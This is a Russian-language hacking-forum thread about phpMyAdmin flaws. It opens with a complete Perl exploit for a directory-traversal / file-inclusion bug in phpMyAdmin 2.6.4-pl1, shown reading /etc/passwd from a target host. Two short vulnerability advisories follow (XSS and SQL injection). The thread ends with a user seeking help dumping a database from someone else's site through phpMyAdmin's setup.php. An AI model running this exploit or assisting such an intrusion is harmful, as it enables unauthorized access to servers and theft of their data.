PhpMyAdmin

[Winux]

phpMyAdmin 2.6.4-pl1 Remote Directory Traversal Exploit
http://news.xss.pro/phpmyadmin.gif
От: 12.10.05

 #!/usr/bin/perl
use IO::Socket;

# SecurityReason.com TEAM
# Maksymilian Arciemowicz ( cXIb8O3 ) cxib@securtiyreason.com
#
# Local file inclusion (./$FILE)
# simple exploit phpMyAdmin 2.6.4-pl1
#
#
# SecurityReason.com

if (@ARGV < 3)
{
print "\r\n SecurityReason TEAM\r\n";
print "[cXIb8O3] EXPLOIT for phpMyAdmin 2.6.4-pl1\r\n";
print " \r\n";
print "perl phpmyadmin-2.6.4-pl1.pl HOST /DIR/ FILE\r\n\r\n";
print "HOST - Host where is phpmyadmin example: http://localhost\r\n";
print "DIR - Directory to PMA example: /phpMyAdmin-2.6.4-pl1/\r\n";
print "FILE - file to inclusion ../../../../../etc/passwd\r\n\r\n";
print "example cmd: perl phpmyadmin-2.6.4-pl1.pl http://localhost /phpMyAdmin-2.6.4-pl1/ ../../../../../etc/passwd\r\n\r\n";
exit();
}

$HOST = $ARGV[0];
$DIR = $ARGV[1]."libraries/grab_globals.lib.php";
$FILE = "usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=".$ARGV[2]."&subform[1][cXIb8O3]=1";
$LENGTH = length $FILE;

print "\r\nATTACK HOST IS: ".$HOST."\r\n\r\n";
$HOST =~ s/(http:\/\/)//;

$get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$HOST", PeerPort => "80") || die "Error 404\r\n\r\n";

print $get1 "POST ".$DIR." HTTP/1.0\n";
print $get1 "Host: ".%HOST."\n";
print $get1 "Content-Type: application/x-www-form-urlencoded\n";
print $get1 "Content-Length: ".$LENGTH."\n\n";

print $get1 $FILE;

while ($odp = <$get1>)
{
if ($odp =~ /<b>Warning<\/b>: main\(\): Unable to access .\/$ARGV[2] in <b>/ ) {
printf "\n\nFile ".$ARGV[2]." no exists.\r\n\r\n";
exit;
}

printf $odp;
}

 

[GZip]

Межсайтовый скриптинг в phpMyAdmin
Программа: phpMyAdmin 2.6.4 - 2.9.0.2
Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение.
Уязвимость существует из-за недостаточной обработки некоторых входных данных в кодировке UTF-7. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.
URL производителя: www.phpmyadmin.net
Решение: Установите последнюю версию (2.9.0.3) с сайта производителя.
Источник: http://www.securitylab.ru/bitrix/redirect....ce%2F276356.php

 

[AKella]

SQL-инъекция в phpMyAdmin

03 марта, 2008

Программа: phpMyAdmin версии до 2.11.5

Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения.

Уязвимость существует из-за недостаточной обработки входных данных в переменной "$_REQUEST". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

URL производителя: www.phpmyadmin.net/home_page/index.php

Решение: Установите последнюю версию 2.11.5 с сайта производителя.

 

[AKella]

Спойлер: 3 у вас 43

Решил я вспомнить молодость. Короче, такая ситуация. Есть сайт, нужно вытащить базу. На серваке phpmyadmin версии 2.11.11.3. Присутствует файл /scripts/setup.php но прав на запись в конфиг нет. Только чтение. Поэтому все мои попытки вставить туда код провалились. Может кто сталкивался с такой проблемой?

 

[+toxa+]

Спойлер: 3

нет прав на запись - стало быть фейл. больше толку от баги нет(

 

[AKella]

+toxa+
Спасибо. Будем копать в другом направлении.